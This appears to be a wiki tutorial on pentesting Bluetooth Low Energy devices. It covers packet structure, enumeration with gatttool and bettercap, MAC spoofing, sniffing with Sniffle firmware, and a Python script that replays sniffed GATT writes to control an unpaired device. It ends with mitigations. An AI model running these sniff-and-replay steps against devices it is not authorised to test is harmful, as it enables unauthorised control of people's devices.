# Pentesting BLE - Bluetooth Low Energy

{{#include ../../banners/hacktricks-training.md}}

## Introduction

Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range 2400 to 2483.5 MHz. In contrast, traditional Bluetooth uses 79 channels in the same range.

BLE devices communicate by sending **advertising packets** (**beacons**); these packets announce the existence of the BLE device to other nearby devices. These beacons sometimes **send data** as well.

The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet, with additional information that did not fit in the initial advertising request, such as the full device name.

![](<../../images/image (152).png>)

The preamble byte synchronises the frequency, while the four-byte access address is a **connection identifier**, used in scenarios where multiple devices try to establish connections on the same channels. After that, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV_NONCONN_IND and ADV_IND.

Devices use the **ADV_NONCONN_IND** PDU type if they **don't accept connections**, so they only send data in the advertising packet. Devices use **ADV_IND** if they **allow connections**, and they **stop sending advertising** packets once a **connection** is established.

### GATT

The **Generic Attribute Profile** (GATT) defines how the **device should format and transfer data**. When you analyse a BLE device's attack surface, you will often concentrate on the GATT (or GATTs), because that is how **device functionality gets triggered** and how data is stored, grouped and modified.
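Before moving on to GATT, here is the advertising-packet layout from the Introduction as parsing code. This is an example added here, not code from the original page: it checks the fixed advertising-channel access address, reads the PDU type and TxAdd bit from the header, extracts AdvA and walks the AD structures (Flags, Local Name, 16-bit service UUIDs) in the payload. The sample packet is constructed for illustration.

```python
import struct

ADV_ACCESS_ADDRESS = 0x8E89BED6  # advertising-channel access address fixed by the Core spec
PDU_TYPES = {0x0: "ADV_IND", 0x1: "ADV_DIRECT_IND", 0x2: "ADV_NONCONN_IND",  # low 4 bits of header
             0x3: "SCAN_REQ", 0x4: "SCAN_RSP", 0x5: "CONNECT_IND", 0x6: "ADV_SCAN_IND"}
# Only these PDU types carry AdvA followed by AD structures (AdvData / ScanRspData)
AD_CARRYING = {"ADV_IND", "ADV_NONCONN_IND", "ADV_SCAN_IND", "SCAN_RSP"}

def parse_ad_structures(data: bytes) -> dict:
    """Walk the length/type/value AD structures of AdvData or ScanRspData."""
    out, i = {}, 0
    while i < len(data):
        ln = data[i]
        if ln == 0:                      # early terminator, the rest is padding
            break
        ad_type, value = data[i + 1], data[i + 2:i + 1 + ln]
        if len(value) != ln - 1:
            raise ValueError("truncated AD structure")
        if ad_type == 0x01:              # Flags
            out["flags"] = value[0]
        elif ad_type in (0x08, 0x09):    # Shortened / Complete Local Name
            out["name"] = value.decode("utf-8", "replace")
        elif ad_type in (0x02, 0x03):    # incomplete / complete list of 16-bit service UUIDs
            out["uuid16"] = [int.from_bytes(value[j:j + 2], "little") for j in range(0, len(value), 2)]
        i += 1 + ln
    return out

def parse_ll_adv_packet(pkt: bytes) -> dict:
    """Parse access address + advertising PDU (preamble and CRC already stripped)."""
    access_address = struct.unpack_from("<I", pkt, 0)[0]
    if access_address != ADV_ACCESS_ADDRESS:
        raise ValueError(f"not an advertising-channel packet: {access_address:#010x}")
    header, length = pkt[4], pkt[5]
    payload = pkt[6:6 + length]
    if length < 6 or len(payload) != length:
        raise ValueError("truncated PDU payload")
    pdu_type = PDU_TYPES.get(header & 0x0F, f"RESERVED_{header & 0x0F:#x}")
    if pdu_type not in AD_CARRYING:
        raise ValueError(f"{pdu_type} does not carry AdvA + AD structures")
    return {
        "pdu_type": pdu_type,
        "connectable": pdu_type == "ADV_IND",
        "random_address": bool(header & 0x40),                   # TxAdd bit
        "adv_a": ":".join(f"{b:02X}" for b in payload[5::-1]),   # AdvA is sent LSB first
        "ad": parse_ad_structures(payload[6:]),
    }

# Constructed sample: ADV_IND from random address C1:A2:B3:D4:E5:F6 carrying Flags=0x06,
# Complete Local Name "Tag" and the 16-bit Immediate Alert service UUID 0x1802
SAMPLE_ADV_IND = bytes.fromhex("d6be898e" "4012" "f6e5d4b3a2c1" "020106" "0409546167" "03030218")
```

The same parser handles the SCAN_RSP PDU (the scan response carries the same AdvA + AD structure layout, which is where the full device name usually appears).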
The GATT lists a device's characteristics, descriptors and services in a table as either 16- or 32-bit values. A **characteristic** is a **data** value **sent** between the central device and the peripheral. These characteristics can have **descriptors** that **provide additional information about them**. **Characteristics** are often **grouped** into **services** if they relate to performing a specific action.

## Enumeration

```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```

### GATTool

**GATTool** allows you to **establish** a **connection** with another device, list that device's **characteristics**, and read and write its attributes.\
GATTTool can start an interactive shell with the `-I` option:

```bash
gatttool -i hci0 -I
[                 ][LE]> connect 24:62:AB:B1:A8:3E
Attempting to connect to A4:CF:12:6C:B3:76
Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle: 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle: 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]

# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req -a <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)

# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16

# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```

### Bettercap

```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```

## Sniffing and actively controlling unpaired BLE devices

Many cheap BLE peripherals do not enforce pairing/bonding. Without bonding, Link Layer encryption is never enabled, so ATT/GATT traffic is in clear text. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.

### Sniffing with Sniffle (CC26x2/CC1352)

Hardware: a Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NCC Group's Sniffle firmware.

Install Sniffle and its Wireshark extcap on Linux:

```bash
if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
    echo "[+] - Sniffle not installed! Installing at 1.10.0..."
    sudo mkdir -p /opt/sniffle
    sudo chown -R $USER:$USER /opt/sniffle
    pushd /opt/sniffle
    wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
    tar xvf v1.10.0.tar.gz
    # Install Wireshark extcap for user and root only
    mkdir -p $HOME/.local/lib/wireshark/extcap
    ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
    sudo mkdir -p /root/.local/lib/wireshark/extcap
    sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
    popd
else
    echo "[+] - Sniffle already installed at 1.10.0"
fi
```

Flash the Sonoff with the Sniffle firmware (make sure your serial device matches, e.g. /dev/ttyUSB0):

```bash
pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd
```

Capture in Wireshark via the Sniffle extcap and jump straight to state-changing writes by filtering:

```text
_ws.col.info contains "Sent Write Command"
```

This highlights ATT Write Commands from the client; the handle and value often map directly to device actions (e.g., write 0x01 to a buzzer/alert characteristic, 0x00 to stop).

Sniffle CLI quick examples:

```bash
python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap
```

Alternative sniffer: Nordic's nRF Sniffer for BLE + Wireshark plugin also works. On small/cheap Nordic dongles you typically overwrite the USB bootloader to load the sniffer firmware, so you either keep a dedicated sniffer dongle or need a J-Link/JTAG to restore the bootloader later.
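To make the "decode GATT operations" step concrete, here is a small ATT decoder added as an example (it is not the page's own tooling and not Sniffle code). It names the ATT opcodes behind the Wireshark filter above and groups client writes by handle, which is exactly the list a device owner needs in order to decide which characteristics must require authenticated writes or pairing; the PDUs are constructed for illustration.

```python
# ATT opcodes (Bluetooth Core spec, Vol 3 Part F); bit 6 set means "command": no response expected
ATT_OPCODES = {0x0A: "Read Request", 0x0B: "Read Response", 0x12: "Write Request",
               0x13: "Write Response", 0x52: "Write Command", 0x1B: "Handle Value Notification"}
WRITE_OPCODES = {0x12, 0x52}

def decode_att(pdu: bytes) -> dict:
    """Decode one ATT PDU into its opcode name plus handle/value where the opcode carries them."""
    if not pdu:
        raise ValueError("empty ATT PDU")
    opcode = pdu[0]
    rec = {"opcode": ATT_OPCODES.get(opcode, f"opcode {opcode:#04x}")}
    if opcode in (0x0A, 0x12, 0x52, 0x1B):          # these start with a 16-bit attribute handle
        if len(pdu) < 3:
            raise ValueError("ATT PDU too short for a handle")
        rec["handle"] = int.from_bytes(pdu[1:3], "little")
        if opcode != 0x0A:                            # writes and notifications carry a value
            rec["value"] = pdu[3:].hex()
    elif opcode == 0x0B:                              # Read Response: value only
        rec["value"] = pdu[1:].hex()
    return rec

def clear_text_writes(pdus, link_encrypted: bool) -> dict:
    """Group client writes by handle. On an unencrypted (unbonded) link every one of these was
    visible to an off-path sniffer, so each listed handle needs authenticated-write permissions
    on the device side. Returns {} when the link was encrypted, since nothing was exposed."""
    if link_encrypted:
        return {}
    writes = {}
    for pdu in pdus:
        if pdu and pdu[0] in WRITE_OPCODES:
            rec = decode_att(pdu)
            writes.setdefault(rec["handle"], []).append(rec["value"])
    return writes

# Constructed sample of a sniffed unbonded session (raw ATT PDUs in hex, both directions):
# read of handle 0x0016 answered with "Tag", two Write Commands to 0x000b (01 then 00),
# one Write Request to 0x002e and its Write Response
SAMPLE_SESSION = [bytes.fromhex(h) for h in (
    "0a1600", "0b546167", "520b0001", "520b0000", "122e0004dc54d9053b4307680a", "13")]
```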
### Active control via GATT

Once you have identified a writable characteristic handle and value from the sniffed traffic, connect as any central and perform the same write:

- With Nordic nRF Connect for Desktop (BLE app):
  - Select the nRF52/nRF52840 dongle, scan and connect to the target.
  - Browse the GATT database and locate the target characteristic (it often has a friendly name, e.g. Alert Level).
  - Perform a Write with the sniffed bytes (e.g. 01 to activate, 00 to stop).
- Automate on Windows with a Nordic dongle using Python + blatann:

```python
import time
import blatann

# CONFIG
COM_PORT = "COM29"                  # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"    # Replace with your target MAC
target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT: open the Nordic dongle and connect as a central
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()

print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
    print("[!] Connection failed.")
    ble_device.close()
    raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle (the one seen in the sniffed Write Command)
for service in peer.database.services:
    for ch in service.characteristics:
        if ch.handle == 0x000b:  # Replace with your handle
            print("[!] Beeping.")
            ch.write(b"\x01")
            time.sleep(2)
            print("[+] And relax.")
            ch.write(b"\x00")

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()
```

### Operational notes and mitigations

- Preference: Sonoff+Sniffle on Linux for robust channel hopping and connection following. Keep a spare Nordic sniffer as a backup.
- Without pairing/bonding, any nearby attacker can observe writes and replay or craft their own to unauthenticated writable characteristics.
- Mitigations: require pairing/bonding and enforce encryption; set characteristic permissions to require authenticated writes; minimise unauthenticated writable characteristics; validate GATT ACLs with Sniffle/nRF Connect.

## References

- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)

{{#include ../../banners/hacktricks-training.md}}